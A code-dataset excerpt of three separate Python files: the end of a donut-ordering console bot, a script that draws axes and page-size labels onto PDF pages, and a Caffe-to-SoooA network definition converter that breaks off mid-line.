the other option, 2\n print(\"Delivery\")\n # - Prints statement stating\n # Delivery to show you have chosen Delivery\n del_pick = \"delivery\"\n # - sets del_pick to equal\n # delivery (will be used in the order print statement function)\n delivery_info()\n # Opens and runs the function called delivery info\n return del_pick\n # returns del_pick information back to del_pick\n\n\n# Click and collect information\ndef click_and_collect_info():\n question = \"Please enter your name: \"\n customer_details['name'] = check_string(question)\n print(customer_details['name'])\n\n question = \"Please enter your phone number: \"\n customer_details['phone'] = check_phone(question, 7, 10)\n print(customer_details['phone'])\n print(customer_details)\n print()\n\n\n# Delivery information\ndef delivery_info():\n question = \"Please enter your name: \"\n customer_details['name'] = check_string(question)\n print(customer_details['name'])\n\n question = \"Please enter your phone number: \"\n customer_details['phone'] = check_phone(question, 7, 10)\n print(customer_details['phone'])\n\n question = \"Please enter your house number: \"\n customer_details['house'] = not_blank(question)\n print(customer_details['house'])\n\n question = \"Please enter your street name: \"\n customer_details['street'] = check_string(question)\n print(customer_details['street'])\n\n question = \"Please enter your suburb: \"\n customer_details['suburb'] = check_string(question)\n print(customer_details['suburb'])\n print(customer_details)\n print()\n\n#donut list\ndef donut_list():\n number_donuts = 12\n for count in range (number_donuts):\n print(\"{} {} ${:.2f}\" .format(count + 1, donut_names[count], donut_prices[count]))\n\n\n# Choose total Number of donuts - max 20\n# donut order - from menu - print each donut ordered with cost\ndef order_donuts():\n # ask for total number of pizzas for order\n num_donuts = 0\n LOW = 1\n HIGH = 20\n MENU_LOW = 1\n MENU_HIGH = 12\n question = (f\"Enter a number between {LOW} and {HIGH} \") \n print(\"How many donuts do you want to order? \")\n num_donuts = val_int(LOW, HIGH, question)\n #choose donut from menu\n for item in range(num_donuts):\n while num_donuts > 0:\n print(\"Please choose your donuts by entering the\"\n \"number from the menu \")\n question = (f\"Enter a number between {MENU_LOW} and {MENU_HIGH} \") \n donut_ordered = val_int(MENU_LOW, MENU_HIGH, question)\n donut_ordered = donut_ordered -1\n order_list.append(donut_names[donut_ordered])\n order_cost.append(donut_prices[donut_ordered])\n print(\"{} ${:.2f}\" .format(donut_names[donut_ordered],donut_prices[donut_ordered]))\n num_donuts = num_donuts-1\n\n#print order out- including if order is del or pick up and names and price of each pizza - total cost including any delivery charge\n\ndef print_order(del_pick):\n print()\n total_cost = sum(order_cost)\n print (\"Customer Details:\")\n if del_pick ==\"click and collect\":\n print(\"Your order is for Click and Collect\")\n print(f\"Customer Name: {customer_details['name']} \\nCustomer Phone: {customer_details['phone']}\")\n elif del_pick == \"delivery\":\n print(\"Your order is for Delivery\")\n print(f\"Customer Name: {customer_details['name']} \\nCustomer Phone: {customer_details['phone']} \\nCustomer Address: {customer_details['house']} {customer_details['street']} {customer_details['suburb']}\")\n print()\n print(\"Your Order Details\")\n count = 0\n for item in order_list:\n print(\"Ordered: {} Cost ${:.2f}\" .format(item, order_cost[count]))\n count = count+1\n print()\n if del_pick == \"delivery\":\n if len(order_list) >= 5:\n print(\"Your order will be delivered to you for free\")\n elif len(order_list) <5:\n print(\"Due to the fact that you have ordered less than 5 items, there is a $9.00 surcharge for delivery\")\n total_cost = total_cost +9\n print(\"Total Order Cost\")\n print(f\"${total_cost:.2f}\")\n\n\n\n#ability to cancel or proceed with order\ndef confirm_cancel(): \n LOW = 1\n HIGH = 2\n question = (f\"Enter a number between {LOW} and {HIGH} \") \n print (\"Please Confirm Your Order\")\n print (\"To confirm please enter 1\")\n print (\"To cancel please enter 2\")\n confirm = val_int(LOW, HIGH, question)\n if confirm == 1:\n print (\"Order Confirmed\")\n print (\"Your order has been sent to our kitchen\")\n print (\"Your delicious donut will be with you shortly\")\n new_exit() \n elif confirm == 2:\n print (\"Your Order has been Cancelled\")\n print (\"You can restart your order or exit the BOT\")\n new_exit() \n#option for new order or to exit\ndef new_exit():\n LOW = 1\n HIGH = 2\n question = (f\"Enter a number between {LOW} and {HIGH} \") \n print (\"Do you want to start another Order or exit?\")\n print (\"To start another order please enter 1 \")\n print (\"To exit the BOT please enter 2 \")\n confirm = val_int(LOW, HIGH, question)\n if confirm == 1:\n print (\"New Order\")\n order_list.clear()\n order_cost.clear()\n customer_details.clear() \n main()\n elif confirm == 2:\n print (\"Exit\")\n order_list.clear()\n order_cost.clear()\n customer_details.clear() \n sys.exit()\n\n#main function\ndef main():\n '''\n Purpose: To run all functions\n A welcome message\n Parameters: none\n Returns: None\n '''\n welcome()\n del_pick = order_type()\n donut_list()\n order_donuts()\n print_order(del_pick)\n confirm_cancel()\n \nmain()\n\n","repo_name":"Ja5onChen/DONUT_BOT","sub_path":"Components/testing v1.py","file_name":"testing v1.py","file_ext":"py","file_size_in_byte":14338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11679635042","text":"import os\nimport sys\nfrom pypdf import PdfReader, PdfWriter\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import letter\nimport io\n\n# 入力ファイルの取得\nif len(sys.argv) != 2:\n print('Usage: python main.py ')\n sys.exit()\n\ninput_file = sys.argv[1]\noutput_file = os.path.splitext(input_file)[0] + '_add_meta.pdf'\n\n# 元のPDFを開く\nexisting_pdf = PdfReader(open(input_file, \"rb\"))\n\n# 出力先\noutput = PdfWriter()\n\n# ページの幅と高さを取得します\nwidth = existing_pdf.pages[0].mediabox[2]\nwidth = int(width)\nheight = existing_pdf.pages[0].mediabox[3]\nheight = int(height)\n\n# 新しいPDF (canvas) を作成\npacket = io.BytesIO()\ncan = canvas.Canvas(packet, pagesize=(width, height))\n\n# マージンを設定します。\nmargin_x = 50\nmargin_y = 50\n\n# x軸とy軸を描画します。\ncan.line(margin_x, margin_y, width, margin_y) # x-axis\n# 青色の線に変更します\ncan.setStrokeColorRGB(0, 0, 1)\ncan.line(margin_x, margin_y, margin_x, height) # y-axis\n\n# x軸とy軸にラベルを追加します。\ncan.drawString(margin_x, margin_y - 20, f\"Width: {width} points\") # X axis label\ncan.drawString(margin_x - 30, margin_y, f\"Height: {height} points\") # Y axis label\n\ncan.save()\n\n# 新しく作成したPDF (canvas) を移動\npacket.seek(0)\nnew_pdf = PdfReader(packet)\n\n# 元のPDFのページ数分ループして新しいPDFに書き込む\nfor i in range(len(existing_pdf.pages)):\n page = existing_pdf.pages[i]\n print(f\"Page {i + 1} rotation: {page.rotation}\")\n print(f\"Page {i + 1} mediabox: {page.mediabox}\")\n print(f\"Page {i + 1} cropbox: {page.cropbox}\")\n page.transfer_rotation_to_content()\n print(f\"Page {i + 1} rotation: {page.rotation}\")\n print(f\"Page {i + 1} mediabox: {page.mediabox}\")\n print(f\"Page {i + 1} cropbox: {page.cropbox}\")\n page.merge_page(new_pdf.pages[0])\n output.add_page(page)\n\n\n# 新しいPDFを保存\nwith open(output_file, \"wb\") as f:\n output.write(f)\n\nwith open(\"hoge.pdf\", \"wb\") as f:\n hoge_pdf = PdfWriter()\n hoge_pdf.add_page(new_pdf.pages[0])\n hoge_pdf.write(f)\n","repo_name":"nnashiki/analyze-iregular-pdf","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1917353414","text":"#!/usr/bin/python2.7 \n# -*- coding: utf-8 -*- \n \n\n\n\n#(1) string array 내부 문자열에 대해 쌍따옴표 적용\n#(3) field 타입(정수형, 실수형)에 따라 number literal 적���하게 적용\n#(4) field value가 문자열이 아닌 타입의 경우 쌍따옴표 제거\n#(5) 일부 enumeration 문자열 타입 불일치 (xavier -> Xavier, MAX -> Max 등...)\n#(6) Solver 정보 추가\n\n#(2) Conv Layer, filterDim.channels 적용\n\n\nimport argparse \nimport os \nimport sys \nimport json\n\nimport pdb\nimport pudb\n\nfrom collections import OrderedDict\n \n\nLAYER_PROP_DEF = os.path.join(os.environ['LAONSILL_DEV_HOME'], 'src/prop/layerPropDef.json')\nNETWORK_PROP_DEF = os.path.join(os.environ['LAONSILL_DEV_HOME'], 'src/prop/networkPropDef.json')\nOBJ_START = '{'\nOBJ_END = '}'\nLIST_START = '['\nLIST_END = ']'\nLIST_DELEM = '^'\n\nINNER_ID_START = 10000\n\n\nskip_layers = set([\n])\n\n\nlist_item = set([\n 'bottom',\n 'top',\n 'param',\n 'dim',\n 'xxxxxxxxxxxxxxxxxxxxxxx'\n])\n\nlayer_convert_dict = OrderedDict({\n 'Data': 'DataInput',\n 'Input': 'DataInput',\n 'Convolution': 'Conv',\n 'Pooling': 'Pooling',\n 'InnerProduct': 'FullyConnected',\n 'ReLU': 'Relu',\n 'Softmax': 'Softmax',\n 'BatchNorm': 'BatchNorm3',\n 'Scale': 'Scale',\n 'Concat': 'Concat',\n 'SoftmaxWithLoss': 'SoftmaxWithLoss',\n 'Eltwise': 'ElementWise',\n 'Dropout': 'DropOut',\n 'xxxxxxxxxxxxxxxxxxxxxxx': ''\n})\n\ncommon_dict = OrderedDict({\n 'name': 'name',\n 'type': 'layer',\n 'bottom': 'input',\n 'top': 'output',\n 'xxxxxxxxxxxxxxxxxxxxxxx': ''\n})\n\nconvolution_dict = OrderedDict({\n 'param' + LIST_DELEM + '0': OrderedDict({\n 'lr_mult': 'weightUpdateParam.lr_mult',\n 'decay_mult': 'weightUpdateParam.decay_mult'\n }),\n 'param' + LIST_DELEM + '1': OrderedDict({\n 'lr_mult': 'biasUpdateParam.lr_mult',\n 'decay_mult': 'biasUpdateParam.decay_mult'\n }),\n 'convolution_param': OrderedDict({\n 'num_output': 'filterDim.filters',\n 'kernel_size': ['filterDim.rows', 'filterDim.cols'],\n 'stride': 'filterDim.stride',\n 'pad': 'filterDim.pad',\n 'weight_filler': OrderedDict({\n 'type': 'weightFiller.type',\n 'value': 'weightFiller.value',\n 'mean': 'weightFiller.mean',\n 'std': 'weightFiller.std'\n }),\n 'bias_filler': OrderedDict({\n 'type': 'biasFiller.type',\n 'value': 'biasFiller.value',\n 'mean': 'biasFiller.mean',\n 'std': 'biasFiller.std'\n }),\n 'bias_term': 'biasTerm',\n 'kernel_h': 'filterDim.rows',\n 'kernel_w': 'filterDim.cols',\n 'pad_h': 'filterDim.pad_h',\n 'pad_w': 'filterDim.pad_w'\n })\n})\n\npooling_dict = OrderedDict({\n 'pooling_param': OrderedDict({\n 'pool': 'poolingType',\n 'kernel_size': ['poolDim.rows', 'poolDim.cols'],\n 'stride': 'poolDim.stride',\n 'pad': 'poolDim.pad',\n 'global_pooling' : 'globalPooling'\n })\n\n})\n\ndropout_dict = OrderedDict({\n 'dropout_param': OrderedDict({\n 'dropout_ratio': 'probability'\n })\n})\n\ninnerproduct_dict = OrderedDict({\n 'param' + LIST_DELEM + '0': OrderedDict({\n 'lr_mult': 'weightUpdateParam.lr_mult',\n 'decay_mult': 'weightUpdateParam.decay_mult'\n }),\n 'param' + LIST_DELEM + '1': OrderedDict({\n 'lr_mult': 'biasUpdateParam.lr_mult',\n 'decay_mult': 'biasUpdateParam.decay_mult'\n }),\n 'inner_product_param': OrderedDict({\n 'num_output': 'nOut',\n 'weight_filler': OrderedDict({\n 'type': 'weightFiller.type',\n 'value': 'weightFiller.value',\n 'mean': 'weightFiller.mean',\n 'std': 'weightFiller.std'\n }),\n 'bias_filler': OrderedDict({\n 'type': 'biasFiller.type',\n 'value': 'biasFiller.value',\n 'mean': 'biasFiller.mean',\n 'std': 'biasFiller.std'\n })\n })\n})\n\n\"\"\"\n# for nvCaffe batch_norm_layer\nbatchnorm_dict = OrderedDict({\n 'batch_norm_param': OrderedDict({\n 'moving_average_fraction': 'movingAverageFraction',\n 'eps': 'eps',\n 'scale_bias': 'scaleBias',\n 'use_global_stats': 'useGlobalStats'\n })\n})\n\"\"\"\n\n# for caffe batch_norm_layer\nbatchnorm_dict = OrderedDict({\n 'batch_norm_param': OrderedDict({\n 'moving_average_fraction': 'movingAverageFraction',\n 'eps': 'eps',\n 'use_global_stats': 'useGlobalStats'\n })\n})\n\nscale_dict = OrderedDict({\n 'scale_param' : OrderedDict({\n 'axis' : 'axis',\n 'num_axes' : 'numAxes',\n 'filler': OrderedDict({\n 'type': 'filler.type',\n 'value': 'filler.value',\n 'mean': 'filler.mean',\n 'std': 'filler.std'\n }),\n 'bias_term' : 'biasTerm',\n 'bias_filler': OrderedDict({\n 'type': 'biasFiller.type',\n 'value': 'biasFiller.value',\n 'mean': 'biasFiller.mean',\n 'std': 'biasFiller.std'\n })\n })\n})\n\nsoftmaxwithloss_dict = OrderedDict({\n 'loss_weight': 'lossWeight'\n})\n\nsoftmax_dict = OrderedDict({\n 'axis': 'softmaxAxis'\n})\n\neltwise_dict = OrderedDict({\n 'eltwise_param': OrderedDict({\n 'operation': 'operation',\n 'coeff': 'coeff',\n 'stable_prod_grad': 'stableProdGrad'\n })\n})\n\n\nlayer_prop = OrderedDict()\nnetwork_prop = OrderedDict()\n\nfiller_param_converter = OrderedDict({\n \"constant\": \"Constant\",\n \"gaussian\": \"Gaussian\",\n \"uniform\": \"Uniform\",\n \"xavier\": \"Xavier\",\n \"msra\": \"MSRA\"\n})\npooling_type_converter = OrderedDict({\n \"MAX\": \"Max\",\n \"AVE\": \"Avg\"\n})\neltwise_op_converter = OrderedDict({\n \"PROD\": \"PROD\",\n \"SUM\": \"SUM\",\n \"MAX\": \"MAX\"\n})\n\nsolver_dict = OrderedDict({\n \"display\": \"testInterval\",\n \"base_lr\": \"baseLearningRate\",\n \"lr_policy\": \"lrPolicy\",\n \"max_iter\": \"maxIterations\",\n \"power\": \"power\",\n \"momentum\": \"momentum\",\n \"weight_decay\": \"weightDecay\",\n \"snapshot\": \"saveInterval\"\n})\n\ninner_id_dict = OrderedDict()\n\n\ndef out_file(line, depth_level, outfile):\n final = ''\n for _ in range(depth_level):\n final += '\\t'\n final += line\n final += '\\n'\n outfile.write(final)\n\ndef gen_key_line(key):\n return '\\\"' + key + '\\\" : ' \n\n\ndef normalize_prop_value(prop):\n if prop == 'std::string':\n return 'str'\n if prop == 'uint32_t':\n return 'int'\n if prop == 'double':\n return 'float'\n return prop\n\ndef parse_layer_prop_def(def_path):\n json_data = open(def_path).read()\n temp = json.loads(json_data)\n\n # parent layer들이 먼저 나오도록 sort\n layer_prop_def = OrderedDict()\n while True:\n keys = temp.keys()\n for k in keys:\n v = temp[k]\n parent = v['PARENT']\n if parent == '':\n layer_prop_def[k] = v\n temp.pop(k, None)\n else:\n if parent in layer_prop_def:\n layer_prop_def[k] = v\n temp.pop(k, None)\n if len(temp.keys()) == 0:\n break\n\n layer_prop.clear()\n for layer_name in layer_prop_def:\n parent = layer_prop_def[layer_name]['PARENT']\n vars = layer_prop_def[layer_name]['VARS']\n\n d = None\n # Base 제외 상속받는 레이어가 있는 경우 \n if parent != '' and parent != 'Base':\n assert(parent in layer_prop), \"PARENT layer prop should be defined first:\" \\\n \"{}\".format(parent)\n d = OrderedDict(layer_prop[parent])\n else:\n d = OrderedDict()\n\n for var in vars:\n if len(var) == 3:\n d[var[0]] = normalize_prop_value(var[1])\n # var가 obj인 경우 \n elif len(var) == 4:\n pre = var[0]\n prop_fields = var[3]\n for prop_field in prop_fields:\n field = pre + \".\" + prop_field[0]\n d[field] = normalize_prop_value(prop_field[1])\n else:\n assert (False), \"invalid length\"\n\n layer_prop[layer_name] = d\n\ndef parse_network_prop_def(def_path):\n json_data = open(def_path).read()\n network_prop_def = json.loads(json_data)\n\n network_prop.clear()\n vars = network_prop_def['VARS']\n\n for var in vars:\n network_prop[var[0]] = normalize_prop_value(var[1])\n\n\n\n\n# root부터 leaf까지 한 레이어에 대해 전체 key 리스트 목록을 조회\n# @param depth_keys: 최종 depth_key가 담기는 list\n# cf) temp_keys: 현재의 경로를 담고 있는 depth key\ndef get_depth_keys(d, parent_keys, depth_keys):\n keys = d.keys()\n key_len = len(keys)\n\n for idx in range(key_len):\n k = keys[idx]\n v = d[k]\n\n temp_keys = None\n if parent_keys == None:\n temp_keys = list()\n else:\n temp_keys = list(parent_keys)\n\n if type(v) is OrderedDict:\n temp_keys.append(k)\n get_depth_keys(v, temp_keys, depth_keys)\n elif type(v) is list and type(v[0]) is OrderedDict :\n for idx in range(len(v)):\n item = v[idx]\n temp_keys.append(k + LIST_DELEM + str(idx))\n\n # list안 dict 케이스\n if type(item) is OrderedDict:\n get_depth_keys(item, temp_keys, depth_keys)\n # list안 list 케이스\n elif type(item) is list:\n assert (False), \"not implemented case\"\n # list안 기타 item 케이스\n else:\n depth_keys.append(temp_keys)\n\n temp_keys.pop()\n else:\n temp_keys.append(k) \n depth_keys.append(temp_keys)\n \n\n# 여러 단계로 구성된 key가 layer dict의 정의와 일치하는지 테스트\ndef is_valid_depth_key(d, depth_key):\n depth_key_len = len(depth_key)\n\n value = None\n for idx in range(depth_key_len):\n key = depth_key[idx]\n\n if key not in d:\n return False\n\n if idx < depth_key_len - 1:\n value = d[key]\n if not type(value) is OrderedDict:\n return False\n d = value\n\n return True\n\ndef get_special_key(key):\n splits = key.split(LIST_DELEM)\n if len(splits) == 2:\n return [splits[0], int(splits[1])]\n elif len(splits) == 1:\n return [None, -1]\n else:\n assert (False), \"invalid key: {}\".format(key)\n\n\n\ndef retrieve_key_value(layer_dict, obj_dict, depth_key):\n depth_key_len = len(depth_key)\n\n ret_key = None\n ret_val = None\n for idx in range(depth_key_len):\n key = depth_key[idx]\n special_key, list_index = get_special_key(key)\n\n ret_key = layer_dict[key]\n if special_key == None:\n ret_val = obj_dict[key]\n else:\n ret_val = obj_dict[special_key][list_index]\n\n layer_dict = ret_key\n obj_dict = ret_val\n\n return ret_key, ret_val\n\ndef convert_key_value_to_line(layer, key, value, last_line):\n line = gen_key_line(key)\n\n prop_type = 'str'\n if key != 'layer':\n assert(layer in layer_prop), \"layer [{}] is not in layer_prop\".format(layer)\n assert(key in layer_prop[layer]), \"prop [{}] is not in layer_prop[{}]\".format(key, layer)\n prop_type = layer_prop[layer][key]\n\n if prop_type == 'float':\n value = str(value)\n if not \".\" in value:\n value += \".0\"\n line += value\n elif prop_type == 'int' or prop_type == 'float' or prop_type == 'bool':\n line += str(value)\n elif prop_type == 'std::vector':\n line += '['\n value_len = len(value)\n for i in range(value_len):\n line += '\\\"' + value[i] + '\\\"'\n if i < value_len -1:\n line += ', '\n line += ']'\n elif prop_type == 'std::vector':\n line += '['\n value_len = len(value)\n for i in range(value_len):\n line += value[i]\n if i < value_len -1:\n line += ', '\n line += ']'\n\n else:\n line += '\\\"' + value + '\\\"' \n\n if not last_line:\n line += ','\n\n return line\n \n\ndef gen_softmax_inner_layer(axis):\n inner_layer_type = 'Softmax'\n inner_layer_id = get_inner_id(inner_layer_type)\n\n # 생성자로 바로 Dict를 생성하니 순서가 꼬인다.\n inner_layer_obj = OrderedDict()\n inner_layer_obj[\"name\"] = \"inner_softmax\"\n inner_layer_obj[\"type\"] = \"Softmax\"\n inner_layer_obj[\"bottom\"] = [\"inner_softmax_\" + str(inner_layer_id) + \"_input\"]\n inner_layer_obj[\"top\"] = [\"inner_softmax_\" + str(inner_layer_id) + \"_output\"]\n inner_layer_obj[\"axis\"] = axis\n\n inner_depth_keys = list()\n for key in inner_layer_obj.keys():\n inner_depth_keys.append(list())\n inner_depth_keys[-1].append(key)\n\n return inner_layer_id, inner_layer_obj, inner_depth_keys\n\n\n\ndef innerlayer_handler(inner_layer_type, inner_layer_id, inner_layer_obj, inner_depth_keys, \\\n depth_level, outfile):\n\n out_file(gen_key_line('innerLayer'), depth_level, outfile)\n out_file(LIST_START, depth_level, outfile)\n depth_level += 1\n\n out_file(OBJ_START, depth_level, outfile)\n depth_level += 1\n\n common_handler(inner_layer_id, inner_layer_obj, inner_depth_keys, depth_level, outfile)\n layer_handler_dict[inner_layer_type](inner_layer_obj, inner_depth_keys, depth_level, outfile)\n\n depth_level -= 1\n out_file(OBJ_END, depth_level, outfile)\n\n depth_level -= 1\n out_file(LIST_END, depth_level, outfile)\n\n\n\ndef common_handler(layer_id, layer_obj, depth_keys, depth_level, outfile):\n wasType = False\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n\n if not is_valid_depth_key(common_dict, depth_key):\n continue\n\n key, value = retrieve_key_value(common_dict, layer_obj, depth_key)\n\n dst_value = None\n # special case: type인 경우 value를 변환해야 함\n # 'type'이 last_line일 수는 없다고 봄 (input 또는 output이 따라옴)\n if depth_key[0] == 'type':\n value = layer_convert_dict[value] \n wasType = True\n\n line = convert_key_value_to_line('Base', key, value, last_line) \n out_file(line, depth_level, outfile)\n\n if wasType:\n line = convert_key_value_to_line('Base', 'id', layer_id, last_line)\n out_file(line, depth_level, outfile)\n wasType = False\n\ndef data_handler(layer_obj, depth_keys, depth_level, outfile):\n pass\n\ndef concat_handler(layer_obj, depth_keys, depth_level, outfile):\n pass\n\ndef input_handler(layer_obj, depth_keys, depth_level, outfile):\n pass\n\ndef convolution_handler(layer_obj, depth_keys, depth_level, outfile):\n paramIdx = 0\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n if depth_key[0] == 'param':\n depth_key[0] += LIST_DELEM + str(paramIdx)\n paramIdx += 1\n\n assert(is_valid_depth_key(convolution_dict, depth_key)), \\\n \"invalid depth key in convolution layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(convolution_dict, layer_obj, depth_key)\n #print(\"key={}, value={}\".format(key, value))\n\n if type(key) is list:\n key_len = len(key)\n for key_idx in range(key_len):\n k = key[key_idx]\n \"\"\"\n if key_idx == key_len - 1:\n last_line = True\n else:\n last_line = False\n \"\"\"\n\n line = convert_key_value_to_line('Conv', k, value, False)\n out_file(line, depth_level, outfile)\n else:\n if key == \"weightFiller.type\" or key == \"biasFiller.type\":\n assert (value in filler_param_converter), \"Unsupported filler type: \"\\\n \"{}\".format(value)\n value = filler_param_converter[value]\n\n line = convert_key_value_to_line('Conv', key, value, last_line)\n out_file(line, depth_level, outfile)\n\n\ndef pooling_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(pooling_dict, depth_key)), \\\n \"invalid depth key in pooling layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(pooling_dict, layer_obj, depth_key)\n #print(\"key={}, value={}\".format(key, value))\n\n if type(key) is list:\n\n key_len = len(key)\n for key_idx in range(key_len):\n k = key[key_idx]\n \"\"\"\n if key_idx == key_len - 1:\n last_line = True\n else:\n last_line = False\n \"\"\"\n line = convert_key_value_to_line('Pooling', k, value, False)\n out_file(line, depth_level, outfile)\n else:\n if key == \"poolingType\":\n assert (value in pooling_type_converter), \"Unsupported pooling type: \"\\\n \"{}\".format(value)\n value = pooling_type_converter[value]\n\n line = convert_key_value_to_line('Pooling', key, value, last_line)\n out_file(line, depth_level, outfile)\n\n\ndef innerproduct_handler(layer_obj, depth_keys, depth_level, outfile):\n paramIdx = 0\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n if depth_key[0] == 'param':\n depth_key[0] += LIST_DELEM + str(paramIdx)\n paramIdx += 1\n\n assert(is_valid_depth_key(innerproduct_dict, depth_key)), \\\n \"invalid depth key in innerproduct layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(innerproduct_dict, layer_obj, depth_key)\n #print(\"key={}, value={}\".format(key, value))\n\n if type(key) is list:\n key_len = len(key)\n for key_idx in range(key_len):\n k = key[key_idx]\n if key_idx == key_len - 1:\n last_line = True\n else:\n last_line = False\n line = convert_key_value_to_line('FullyConnected', k, value, last_line)\n out_file(line, depth_level, outfile)\n else:\n if key == \"weightFiller.type\" or key == \"biasFiller.type\":\n assert (value in filler_param_converter), \"Unsupported filler type: \"\\\n \"{}\".format(value)\n value = filler_param_converter[value]\n line = convert_key_value_to_line('FullyConnected', key, value, last_line)\n out_file(line, depth_level, outfile)\n\n\ndef batchnorm_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(batchnorm_dict, depth_key)), \\\n \"invalid depth key in batchnorm layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(batchnorm_dict, layer_obj, depth_key)\n\n line = convert_key_value_to_line('BatchNorm3', key, value, last_line)\n out_file(line, depth_level, outfile)\n\ndef scale_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(scale_dict, depth_key)), \\\n \"invalid depth key in scale layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(scale_dict, layer_obj, depth_key)\n\n line = convert_key_value_to_line('Scale', key, value, last_line)\n out_file(line, depth_level, outfile)\n\ndef relu_handler(layer_obj, depth_keys, depth_level, outfile):\n print('relu_handler ... ')\n pass\n\ndef softmax_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(softmax_dict, depth_key)), \\\n \"invalid depth key in softmax layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(softmax_dict, layer_obj, depth_key)\n\n line = convert_key_value_to_line('Softmax', key, value, last_line)\n out_file(line, depth_level, outfile)\n\ndef dropout_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(dropout_dict, depth_key)), \\\n \"invalid depth key in dropout layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(dropout_dict, layer_obj, depth_key)\n\n line = convert_key_value_to_line('DropOut', key, value, last_line)\n out_file(line, depth_level, outfile)\n\ndef eltwise_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(eltwise_dict, depth_key)), \\\n \"invalid depth key in eltwise layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(eltwise_dict, layer_obj, depth_key)\n\n if key == \"operation\":\n assert (value in eltwise_op_converter), \"Unsupported eltwise op: \"\\\n \"{}\".format(value)\n value = eltwise_op_converter[value]\n\n # 아래의 layer 이름은 SoooA 기준이다.\n line = convert_key_value_to_line('ElementWise', key, value, last_line)\n out_file(line, depth_level, outfile)\n\n\ndef get_inner_id(layer_type):\n layer_id = -1\n\n if layer_type in inner_id_dict:\n inner_id_dict[layer_type] += 10\n layer_id = inner_id_dict[layer_type]\n else:\n global INNER_ID_START\n INNER_ID_START += 1000\n inner_id_dict[layer_type] = INNER_ID_START\n layer_id = inner_id_dict[layer_type]\n\n return layer_id\n\n\ndef softmaxwithloss_handler(layer_obj, depth_keys, depth_level, outfile):\n depth_keys_len = len(depth_keys)\n axis = 2\n foundPropDown = False\n foundSoftmaxAxis = False\n\n for i in range(depth_keys_len):\n depth_key = depth_keys[i]\n last_line = (i == depth_keys_len - 1)\n if is_valid_depth_key(common_dict, depth_key):\n continue\n\n assert(is_valid_depth_key(softmaxwithloss_dict, depth_key)), \\\n \"invalid depth key in softmaxwithloss layer: {}\".format(depth_key)\n\n key, value = retrieve_key_value(softmaxwithloss_dict, layer_obj, depth_key)\n if key == \"softmaxAxis\":\n axis = int(value)\n foundSoftmaxAxis = True\n elif key == \"propDown\":\n foundPropDown = True\n\n line = convert_key_value_to_line('SoftmaxWithLoss', key, value, last_line)\n out_file(line, depth_level, outfile)\n\n if not foundPropDown:\n line = convert_key_value_to_line('Base', 'propDown', [\"true\", \"false\"], False)\n out_file(line, depth_level, outfile)\n if not foundSoftmaxAxis:\n line = convert_key_value_to_line('SoftmaxWithLoss', 'softmaxAxis', axis, False)\n out_file(line, depth_level, outfile)\n\n\n inner_layer_id, inner_layer_obj, inner_depth_keys = gen_softmax_inner_layer(axis)\n innerlayer_handler('Softmax', inner_layer_id, inner_layer_obj, inner_depth_keys, \\\n depth_level, outfile)\n\n\n\n\n\n\n\nlayer_handler_dict = OrderedDict({\n 'Data': data_handler,\n 'Input': input_handler,\n 'Convolution': convolution_handler,\n 'Pooling': pooling_handler,\n 'InnerProduct': innerproduct_handler,\n 'ReLU': relu_handler,\n 'Softmax': softmax_handler,\n 'BatchNorm': batchnorm_handler,\n 'Scale': scale_handler,\n 'SoftmaxWithLoss': softmaxwithloss_handler,\n 'Concat': concat_handler,\n 'Softmax': softmax_handler,\n 'Eltwise': eltwise_handler,\n 'Dropout': dropout_handler,\n 'xxxxxxxxxxxxxxxxxxxxxxx': None\n})\n\n\n\n\n\n\n \ndef get_arguments(): \n \"\"\"Parse all the arguments provided from the CLI. \n \n Returns: \n A list of parsed arguments. \n \"\"\" \n parser = argparse.ArgumentParser(description=\"Caffe protobuf to SoooA network def Converter\") \n parser.add_argument(\"-i\", \"--infile\", type=str,\n help=\"input 